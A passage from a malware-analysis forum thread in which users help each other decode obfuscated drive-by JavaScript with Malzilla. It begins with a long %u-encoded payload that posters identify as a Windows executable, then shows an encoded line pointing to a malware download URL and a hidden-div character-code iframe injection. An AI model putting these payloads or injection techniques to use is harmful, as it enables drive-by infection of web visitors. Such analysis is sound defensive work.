%ufffe%uffff%u0000%u0000%u7128%u0040%u0000%u0000%ufffe%uffff%u0000%u0000%uffd0%uffff%u0000%u0000%ufffe%uffff%u0000%u0000%u7566%u0040%u9850%u0000%u0000%u0000%u0000%u0000%u9a7e%u0000%u8014%u0000%u983c%u0000%u0000%u0000%u0000%u0000%u9ace%u0000%u8000%u0000%u9958%u0000%u0000%u0000%u0000%u0000%u9adc%u0000%u811c%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u9aae%u0000%u9a9e%u0000%u9a8c%u0000%u9ac0%u0000%u0000%u0000%u99d2%u0000%u99e4%u0000%u99f4%u0000%u9a06%u0000%u9a16%u0000%u99c4%u0000%u9a3c%u0000%u9a50%u0000%u9a60%u0000%u9a70%u0000%u99bc%u0000%u99a4%u0000%u9996%u0000%u9a2c%u0000%u9988%u0000%u9e8a%u0000%u9e7e%u0000%u9e70%u0000%u9e60%u0000%u9e54%u0000%u9e2c%u0000%u9ae8%u0000%u9afa%u0000%u9b0e%u0000%u9b22%u0000%u9b3e%u0000%u9b5c%u0000%u9b68%u0000%u9b80%u0000%u9b98%u0000%u9ba2%u0000%u9bae%u0000%u9bc0%u0000%u9bd4%u0000%u9be2%u0000%u9bee%u0000%u9bfc%u0000%u9c06%u0000%u9c16%u0000%u9c2c%u0000%u9c38%u0000%u9c48%u0000%u9c62%u0000%u9c7a%u0000%u9c94%u0000%u9caa%u0000%u9cc4%u0000%u9cd6%u0000%u9ce4%u0000%u9cf6%u0000%u9d0e%u0000%u9d1c%u0000%u9d2a%u0000%u9d36%u0000%u9d50%u0000%u9d60%u0000%u9d76%u0000%u9d90%u0000%u9da0%u0000%u9db6%u0000%u9dc6%u0000%u9dd8%u0000%u9dea%u0000%u9e02%u0000%u9e1a%u0000%u0000%u0000%u0039%u8000%u0004%u8000%u000c%u8000%u0073%u8000%u0009%u8000%u0074%u8000%u0010%u8000%u0017%u8000%u0003%u8000%u0034%u8000%u0013%u8000%u0000%u0000%u0105%u7845%u7469%u7250%u636f%u7365%u0073%u0317%u6f4d%u6576%u6946%u656c%u7845%u0041%u0285%u6547%u5774%u6e69%u6f64%u7377%u6944%u6572%u7463%u726f%u4179%u0000%u042b%u6c53%u6565%u0070%u014a%u7246%u6565%u6f43%u736e%u6c6f%u0065%u0095%u7243%u6165%u6574%u7250%u636f%u7365%u4173%u0000%u01e7%u6547%u4c74%u7361%u4574%u7272%u726f%u0000%u0222%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u0000%u02f6%u6f4c%u6461%u694c%u7262%u7261%u4179%u0000%u01f5%u6547%u4d74%u646f%u6c75%u4665%u6c69%u4e65%u6d61%u4165%u0000%u008c%u7243%u6165%u6574%u754d%u6574%u4178%u0000%u02d6%u7349%u6544%u7562%u6767%u7265%u7250%u7365%u6e65%u0074%u037d%u6552%u656c%u7361%u4d65%u7475%u7865%u0000%u027a%u6547%u5674%u7265%u6973%u6e6f%u7845%u0041%u0062%u6f43%u7970%u6946%u656c%u7845%u0041%u454b%u4e52%u4c45%u3233%u642e%u6c6c%u0000%u0277%u6552%u5367%u7465%u6156%u756c%u4565%u4178%u0000%u025a%u6552%u4f67%u6570%u4b6e%u7965%u7845%u0041%u0241%u6552%u4467%u6c65%u7465%u5665%u6c61%u6575%u0041%u022a%u6552%u4367%u6f6c%u6573%u654b%u0079%u4441%u4156%u4950%u3233%u642e%u6c6c%u0000%u5357%u5f32%u3233%u642e%u6c6c%u0000%u0170%u6547%u4374%u6d6f%u616d%u646e%u694c%u656e%u0041%u0437%u6554%u6d72%u6e69%u7461%u5065%u6f72%u6563%u7373%u0000%u01aa%u6547%u4374%u7275%u6572%u746e%u7250%u636f%u7365%u0073%u0448%u6e55%u6168%u646e%u656c%u4564%u6378%u7065%u6974%u6e6f%u6946%u746c%u7265%u0000%u041f%u6553%u5574%u686e%u6e61%u6c64%u6465%u7845%u6563%u7470%u6f69%u466e%u6c69%u6574%u0072%u015c%u6547%u4374%u4950%u666e%u006f%u02c5%u6e49%u6574%u6c72%u636f%u656b%u4964%u636e%u6572%u656d%u746e%u0000%u02c1%u6e49%u6574%u6c72%u636f%u656b%u4464%u6365%u6572%u656d%u746e%u0000%u0153%u6547%u4174%u5043%u0000%u0214%u6547%u4f74%u4d45%u5043%u0000%u02e0%u7349%u6156%u696c%u4364%u646f%u5065%u6761%u0065%u01fa%u6547%u4d74%u646f%u6c75%u4865%u6e61%u6c64%u5765%u0000%u043e%u6c54%u4773%u7465%u6156%u756c%u0065%u043c%u6c54%u4173%u6c6c%u636f%u0000%u043f%u6c54%u5373%u7465%u6156%u756c%u0065%u043d%u6c54%u4673%u6572%u0065%u03f4%u6553%u4c74%u7361%u4574%u7272%u726f%u0000%u01ae%u6547%u4374%u7275%u6572%u746e%u6854%u6572%u6461%u6449%u0000%u0497%u7257%u7469%u4665%u6c69%u0065%u023e%u6547%u5374%u6474%u6148%u646e%u656c%u0000%u014b%u7246%u6565%u6e45%u6976%u6f72%u6d6e%u6e65%u5374%u7274%u6e69%u7367%u0041%u01c0%u6547%u4574%u766e%u7269%u6e6f%u656d%u746e%u7453%u6972%u676e%u0073%u014c%u7246%u6565%u6e45%u6976%u6f72%u6d6e%u6e65%u5374%u7274%u6e69%u7367%u0057%u0484%u6957%u6564%u6843%u7261%u6f54%u754d%u746c%u4269%u7479%u0065%u01c2%u6547%u4574%u766e%u7269%u6e6f%u656d%u746e%u7453%u6972%u676e%u5773%u0000%u03f0%u6553%u4874%u6e61%u6c64%u4365%u756f%u746e%u0000%u01d8%u6547%u4674%u6c69%u5465%u7079%u0065%u023c%u6547%u5374%u6174%u7472%u7075%u6e49%u6f66%u0041%u00bf%u6544%u656c%u6574%u7243%u7469%u6369%u6c61%u6553%u7463%u6f69%u006e%u02a4%u6548%u7061%u7243%u6165%u6574%u0000%u0461%u6956%u7472%u6175%u466c%u6572%u0065%u02a6%u6548%u7061%u7246%u6565%u0000%u0359%u7551%u7265%u5079%u7265%u6f66%u6d72%u6e61%u6563%u6f43%u6e75%u6574%u0072%u026a%u6547%u5474%u6369%u436b%u756f%u746e%u0000%u01ab%u6547%u4374%u7275%u6572%u746e%u7250%u636f%u7365%u4973%u0064%u0253%u6547%u5374%u7379%u6574%u546d%u6d69%u4165%u4673%u6c69%u5465%u6d69%u0065%u02e6%u434c%u614d%u5370%u7274%u6e69%u4167%u0000%u031f%u754d%u746c%u4269%u7479%u5465%u576f%u6469%u4365%u6168%u0072%u02e8%u434c%u614d%u5370%u7274%u6e69%u5767%u0000%u0240%u6547%u5374%u7274%u6e69%u5467%u7079%u4165%u0000%u0243%u6547%u5374%u7274%u6e69%u5467%u7079%u5765%u0000%u02f4%u654c%u7661%u4365%u6972%u6974%u6163%u536c%u6365%u6974%u6e6f%u0000%u00da%u6e45%u6574%u4372%u6972%u6974%u6163%u536c%u6365%u6974%u6e6f%u0000%u01e9%u6547%u4c74%u636f%u6c61%u4965%u666e%u416f%u0000%u02ba%u6e49%u7469%u6169%u696c%u657a%u7243%u7469%u6369%u6c61%u6553%u7463%u6f69%u416e%u646e%u7053%u6e69%u6f43%u6e75%u0074%u02a2%u6548%u7061%u6c41%u6f6c%u0063%u045e%u6956%u7472%u6175%u416c%u6c6c%u636f%u0000%u02a9%u6548%u7061%u6552%u6c41%u6f6c%u0063%u039a%u7452%u556c%u776e%u6e69%u0064%u02ab%u6548%u7061%u6953%u657a%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0016%u0000%u0002%u0000%u0002%u0000%u0003%u0000%u0002%u0000%u0004%u0000%u0018%u0000%u0005%u0000%u000d%u0000%u0006%u0000%u0009%u0000%u0007%u0000%u000c%u0000%u0008%u0000%u000c%u0000%u0009%u0000%u000c%u0000%u000a%u0000%u0007%u0000%u000b%u0000%u0008%u0000%u000c%u0000%u0016%u0000%u000d%u0000%u0016%u0000%u000f%u0000%u0002%u0000%u0010%u0000%u000d%u0000%u0011%u0000%u0012%u0000%u0012%u0000%u0002%u0000%u0021%u0000%u000d%u0000%u0035%u0000%u0002%u0000%u0041%u0000%u000d%u0000%u0043%u0000%u0002%u0000%u0050%u0000%u0011%u0000%u0052%u0000%u000d%u0000%u0053%u0000%u000d%u0000%u0057%u0000%u0016%u0000%u0059%u0000%u000b%u0000%u006c%u0000%u000d%u0000%u006d%u0000%u0020%u0000%u0070%u0000%u001c%u0000%u0072%u0000%u0009%u0000%u0006%u0000%u0016%u0000%u0080%u0000%u000a%u0000%u0081%u0000%u000a%u0000%u0082%u0000%u0009%u0000%u0083%u0000%u0016%u0000%u0084%u0000%u000d%u0000%u0091%u0000%u0029%u0000%u009e%u0000%u000d%u0000%u00a1%u0000%u0002%u0000%u00a4%u0000%u000b%u0000%u00a7%u0000%u000d%u0000%u00b7%u0000%u0011%u0000%u00ce%u0000%u0002%u0000%u00d7%u0000%u000b%u0000%u0718%u0000%u000c%u0000%u000c%u0000%u0008%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u0000%u0000%u0000%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6261%u6463%u6665%u6867%u6a69%u6c6b%u6e6d%u706f%u7271%u7473%u7675%u7877%u7a79%u0000%u0000%u0000%u4241%u4443%u4645%u4847%u4a49%u4c4b%u4e4d%u504f%u5251%u5453%u5655%u5857%u5a59%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u0000%u0000%u0000%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6100%u6362%u6564%u6766%u6968%u6b6a%u6d6c%u6f6e%u7170%u7372%u7574%u7776%u7978%u007a%u0000%u0000%u4100%u4342%u4544%u4746%u4948%u4b4a%u4d4c%u4f4e%u5150%u5352%u5554%u5756%u5958%u005a%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ua180%u0040%u0201%u0804%u03a4%u0000%u8260%u8279%u0021%u0000%u0000%u0000%udfa6%u0000%u0000%u0000%ua5a1%u0000%u0000%u0000%u9f81%ufce0%u0000%u0000%u7e40%ufc80%u0000%u0000%u03a8%u0000%ua3c1%ua3da%u0020%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ufe81%u0000%u0000%u0000%ufe40%u0000%u0000%u0000%u03b5%u0000%ua3c1%ua3da%u0020%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ufe81%u0000%u0000%u0000%ufe41%u0000%u0000%u0000%u03b6%u0000%ua2cf%ua2e4%u001a%ua2e5%ua2e8%u005b%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ufe81%u0000%u0000%u0000%u7e40%ufea1%u0000%u0000%u0551%u0000%uda51%uda5e%u0020%uda5f%uda6a%u0032%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ud381%uded8%uf9e0%u0000%u7e31%ufe81%u0000%u0000%u8bdc%u0040%ufffe%uffff%u0043%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%uaaa8%u0040%u0000%u0000%u0000%u0000%u89d8%u0040%u8e60%u0040%u8fe0%u0040%ua9e8%u0040%ua6b0%u0040%u0001%u0000%ua6b0%u0040%ua180%u0040%uffff%uffff%uffff%uffff%u362e%u0040%u0000%u0000%u0002%u0000%u87c0%u0040%u0008%u0000%u8794%u0040%u0009%u0000%u8768%u0040%u000a%u0000%u86d0%u0040%u0010%u0000%u86a4%u0040%u0011%u0000%u8674%u0040%u0012%u0000%u8650%u0040%u0013%u0000%u8624%u0040%u0018%u0000%u85ec%u0040%u0019%u0000%u85c4%u0040%u001a%u0000%u858c%u0040%u001b%u0000%u8554%u0040%u001c%u0000%u852c%u0040%u001e%u0000%u850c%u0040%u001f%u0000%u84a8%u0040%u0020%u0000%u8470%u0040%u0021%u0000%u8378%u0040%u0022%u0000%u82d8%u0040%u0078%u0000%u82c4%u0040%u0079%u0000%u82b4%u0040%u007a%u0000%u82a4%u0040%u00fc%u0000%u82a0%u0040%u00ff%u0000%u8290%u0040%u0003%u0000%u0007%u0000%u0078%u0000%u000a%u0000%uffff%uffff%u0a80%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0010%u0000%ue64e%ubb40%u19b1%u44bf%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u89d8%u0040%u8bda%u0040%u9208%u0040%u9204%u0040%u9200%u0040%u91fc%u0040%u91f8%u0040%u91f4%u0040%u91f0%u0040%u91e8%u0040%u91e0%u0040%u91d8%u0040%u91cc%u0040%u91c0%u0040%u91b8%u0040%u91ac%u0040%u91a8%u0040%u91a4%u0040%u91a0%u0040%u919c%u0040%u9198%u0040%u9194%u0040%u9190%u0040%u918c%u0040%u9188%u0040%u9184%u0040%u9180%u0040%u917c%u0040%u9174%u0040%u9168%u0040%u9160%u0040%u9158%u0040%u9198%u0040%u9150%u0040%u9148%u0040%u9140%u0040%u9134%u0040%u912c%u0040%u9120%u0040%u9114%u0040%u9110%u0040%u910c%u0040%u9100%u0040%u90ec%u0040%u90e0%u0040%u0409%u0000%u0001%u0000%u0000%u0000%ua9e8%u0040%u002e%u0000%uaaa4%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%u7f7f%u7f7f%u7f7f%u7f7f%uaaa8%u0040%u0001%u0000%u002e%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u0000%u0000%u0000%u0000%u7080%u0000%u0001%u0000%uf1f0%uffff%u0000%u0000%u5350%u0054%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u4450%u0054%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%uab30%u0040%uab70%u0040%uffff%uffff%u0000%u0000%u0000%u0000%uffff%uffff%u0000%u0000%u0000%u0000%u0003%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0520%u1993%u0000%u0000%u0000%u0000%u0000%u0000%uffff%uffff%u001e%u0000%u003b%u0000%u005a%u0000%u0078%u0000%u0097%u0000%u00b5%u0000%u00d4%u0000%u00f3%u0000%u0111%u0000%u0130%u0000%u014e%u0000%u016d%u0000%uffff%uffff%u001e%u0000%u003a%u0000%u0059%u0000%u0077%u0000%u0096%u0000%u00b4%u0000%u00d3%u0000%u00f2%u0000%u0110%u0000%u012f%u0000%u014d%u0000%u016c%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0004%u0000%u0000%u0001%u0018%u0000%u0018%u8000%u0000%u0000%u0000%u0000%u0004%u0000%u0000%u0001%u0001%u0000%u0030%u8000%u0000%u0000%u0000%u0000%u0004%u0000%u0000%u0001%u0409%u0000%u0048%u0000%uc058%u0000%u015a%u0000%u04e4%u0000%u0000%u0000%u613c%u7373%u6d65%u6c62%u2079%u6d78%u6e6c%u3d73%u7522%u6e72%u733a%u6863%u6d65%u7361%u6d2d%u6369%u6f72%u6f73%u7466%u632d%u6d6f%u613a%u6d73%u762e%u2231%u6d20%u6e61%u6669%u7365%u5674%u7265%u6973%u6e6f%u223d%u2e31%u2230%u0d3e%u200a%u3c20%u7274%u7375%u4974%u666e%u206f%u6d78%u6e6c%u3d73%u7522%u6e72%u733a%u6863%u6d65%u7361%u6d2d%u6369%u6f72%u6f73%u7466%u632d%u6d6f%u613a%u6d73%u762e%u2233%u0d3e%u200a%u2020%u3c20%u6573%u7563%u6972%u7974%u0d3e%u200a%u2020%u2020%u3c20%u6572%u7571%u7365%u6574%u5064%u6972%u6976%u656c%u6567%u3e73%u0a0d%u2020%u2020%u2020%u2020%u723c%u7165%u6575%u7473%u6465%u7845%u6365%u7475%u6f69%u4c6e%u7665%u6c65%u6c20%u7665%u6c65%u223d%u7361%u6e49%u6f76%u656b%u2272%u7520%u4169%u6363%u7365%u3d73%u6622%u6c61%u6573%u3e22%u2f3c%u6572%u7571%u7365%u6574%u4564%u6578%u7563%u6974%u6e6f%u654c%u6576%u3e6c%u0a0d%u2020%u2020%u2020%u2f3c%u6572%u7571%u7365%u6574%u5064%u6972%u6976%u656c%u6567%u3e73%u0a0d%u2020%u2020%u2f3c%u6573%u7563%u6972%u7974%u0d3e%u200a%u3c20%u742f%u7572%u7473%u6e49%u6f66%u0d3e%u3c0a%u612f%u7373%u6d65%u6c62%u3e79%u4150%u4150%u4444%u4e49%u5847%u5058%u4441%u4944%u474e%u4150%u4444%u4e49%u5847%u5058%u4441%u4944%u474e%u4150%u4444%u4e49%u5847%u5058%u4441%u4944%u474e%u4150%u4444%u4e49%u5847%u5058%u4441%u4944%u474e%u4150%u4444%u4e49%u5847%u5058%u4441");
But when paste this code into Misc Decoders tab and try Decode UCS2 button, malzilla could not decode this script (Concatenate button is similar). So, I need your help to decode this script.
Thanks for your usefull mozilla!
-
Hi denmilu,
remove var payload = unescape(" at the beginning of the script and "); at the end of script.
Click on "UCS2 to Hex" and on "Hex to bin" after that.
You will get plain EXE file.
-
Hi Bobby,
Thanks for your help but in my mazilla 1.2.0 I did not find button "Hex to bin".
Because I did not find "Hex to bin" button, So I click on " Hex to File" and after that, I got a filename.bin, and I could not read the content inside. :(
So do you have any suggestion for me to do now? I wana to find the link in this decode script.
I has just beging use mazilla, so the first time i think I will have many problems, hope you help me pass this.
Thank you!
-
I think here is a simple encode script, similar with above,
JWXNcwDTisuUZviJAX+=unescape("%u7468%u7074%u2F3A%u652F%u7078%u6F6C%u7469%u612E%u6470%u6972%u6C6C%u612E%u6973%u2F61%u616D%u776C%u7261%u3065%u2E31%u7865%u0065");
And when do as your intruction i got the link
http://exploit.apdrill.asia/malware01.exe
but with link above, i can not read the content on Bin file.
I also Attach a txt file that content encode content, but i could not decode it to view plain content inside, can you tell me how to decode it?
-
Remove EVERYTHING except the USC code, and then click USC2 To Hex, then copy it and paste it into the Hex decoder tab ;) (it's got an MZ header at the top indicating it's an actual executable btw)
-
Should've looked at the next page before replying, hehe.
It's Hex to File btw, not Hex to Bin ;) (on the Misc Decoders tab)
-
So do you have any suggestion for me to do now? I wana to find the link in this decode script.
You can load the .bin in either the Hex Decoder tab, or download and install FileInsight ;)
-
Hi MysteryFCM,
Thanks for your help!
Now I have understood the menthod to decode this type (%uxxxx) of script, But I wonder how can we could encode a link to USC code? Do we have any tool help us to do that?
For example, we have a link http://www.malwaredomainlist.com So how can we encode it to a USC code?
-
Why would you want to?
-
Hi MysteryFCM,
Because I'm preparing for a lecture, so I need to understand all technology that used in malicious codes. The main purpose is analysic malware, but before analysic, we need to know how it can be that (how to encode).
So I need your help! Thanks
-
If it's for a lecture, I'll let you do the work and just give you a pointer ;)
http://php.net/manual/en/function.iconv.php
Would defeat the object if we did it for you ;)
-
Oh, thank you!
Actually, I want to do something by myselft and I think I can do what I want with the page you gave. It's so simple! ;)
-
No problem :)
-
Hi all,
I have a problem when use mazilla to decode a hex code, After copy a hex code and open download tab then click HEX tab, Right click and chose "paste as hex" I will see the result that was decoded in the right conner, But with some hex code, it is could not decode. So could you show me how to use mazilla to decode some hex code that I had attached bellow.
Thanks.
-
Replace the spaces with %, and remove the line breaks
-
Hi MysteryFCM,
I did it, thank you very much! :D
-
Hi MysteryFCM,
I think i need your help again, I have two files containing encrypted content, but this encrypt is not similar with some script i have seen, So can you show me how to decode them? And do you have any intruction if I use Firebug in this case?
I have attached 2 files bellow, and waiting your answer.
Thanks
-
The first is a standard Gumblar script and decodes just fine without modification, in Malzilla.
The second requires you modify the script a bit, so the div becomes a var (using the id= as the var name). In this case;
<div style="display:none" id="aots2010">60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,106,112,99,101,114,116,46,111,114,46,106,112,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62</div>
Becomes;
var aots2010 = "60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,106,112,99,101,114,116,46,111,114,46,106,112,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62";
You then just make the necessary removal in the unescape string;
var%20ww%20%3D%20document.getElementById%28%22aots2010%22%29.innerHTML
Becomes;
var%20ww%20%3D%20aots2010
I don't use Firebug I'm afraid, so can't help with that one.
-
I forgot to mention btw, the decoded result would be;
var ww = aots2010;var xx = ww.split(",");for (i=0; i<xx.length; i++){yy = String.fromCharCode(xx[i]);document.write(yy);}
You'd then need to throw this together with the first, so it becomes;
